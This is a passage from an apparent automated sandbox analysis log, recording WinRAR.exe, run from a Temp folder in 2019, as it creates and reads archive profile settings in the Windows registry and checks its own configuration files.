Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2, value_name = Name, data = Backup selected files, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3, value_name = Name, data = Create 10 MB volumes, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Name, data = ZIP archive (low compression), size = 60, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Default, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcName False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileNames False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ImmExec, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ExclNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = StoreNames, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = UseRAR, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RAR5, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXModule, size = 2, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Delete Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFX False 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXIcon, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXLogo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SFXElevate, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = CmtFile, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = CmtDataWide, size = 2, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VolumeSize, data = 0, size = 4, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VolSizeMod, data = 2, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VolPause, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = OldVolNames, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RecVolNumber, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Update, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Fresh, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SyncFiles, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Overwrite, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Move, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcRecBin, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcWipe, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = WipeIfPassword, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Solid, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Test, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RecEnabled, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = RecSize, data = 4294967293, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = EraseDest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = AddArcOnly, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ClearArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Lock, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Method, data = 3, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Background, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = WaitForOther, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = Shutdown, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PasswordData, size = 1, type = REG_BINARY True 1
Fn
Data
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = EncryptHeaders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ZipLegacyEncrypt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = OpenShared, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ProcessOwners, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SaveStreams, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SaveSymLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SaveHardLinks, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = GenerateArcName, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = VersionControl, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = BLAKE2, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileCopies, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = QuickOpen, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = GenerateMask, data = yyyymmddhhmmss, size = 30, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileTimeMode, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileDays, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileHours, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileMinutes, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = FileTimeLimit, data = 0, size = 8, type = REG_QWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcTimeOriginal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ArcTimeLatest, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = mtime, data = 4, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = ctime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = atime, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PathsAbs, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PathsNone, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PathsAbsDrive, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SeparateArc, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SeparateArcDoubleExt, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = SeparateArcSubfolders, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = EmailArcTo, size = 2, type = REG_SZ True 1
Fn
Registry Create Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Write Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4, value_name = PackDetails, size = 192, type = REG_BINARY True 1
Fn
Data
System Get Time type = System Time, time = 2019-04-02 12:04:16 (UTC) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = VerInfo, type = REG_BINARY True 1
Fn
Data
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Create filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, type = file_type True 1
Fn
File Read filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\version.dat, size = 4096, size_out = 12 True 1
Fn
Data
Mutex Create mutex_name = WinRAR_Busy True 1
Fn
Window Find class_name = WinRarWindow True 1
Fn
Window Create window_name = WinRAR, class_name = WinRarWindow, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR\Policy False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Policy False 1
Fn
System Get Time type = Local Time, time = 2019-04-02 16:04:16 (Local Time) True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\Software\WinRAR False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarkey, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = Priority, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR, value_name = rarreg.key, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Paths False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Roaming\WinRAR\Settings.reg, type = file_attributes False 1
Fn
Module Get Filename module_name = C:\Users\WhuOXYsD\AppData\Local\Temp\rarlng.dll, process_name = c:\users\whuoxysd\appdata\local\temp\winrar.exe, file_name_orig = C:\Users\WhuOXYsD\AppData\Local\Temp\WinRAR.exe, size = 2048 True 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
File Get Info filename = \\?\C:\Users\WhuOXYsD\AppData\Local\Temp\Settings.reg, type = file_attributes False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Extraction False 1
Fn
Keyboard Get Info type = KB_CODEPAGE, result_out = 437 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\General True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\General, value_name = SMP, data = 1, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\1 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\2 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\3 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\4 True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\5 False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ArcName, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = FileNames False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = ExclNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = StoreNames, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = Default, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = UseRAR, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = RAR5, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXModule, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFX, data = 0, type = REG_NONE False 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXIcon, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXLogo, type = REG_SZ True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = SFXElevate, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Registry Open Key reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0 True 1
Fn
Registry Read Value reg_name = HKEY_CURRENT_USER\Software\WinRAR\Profiles\0, value_name = CmtFile, type = REG_SZ True 1
Fn
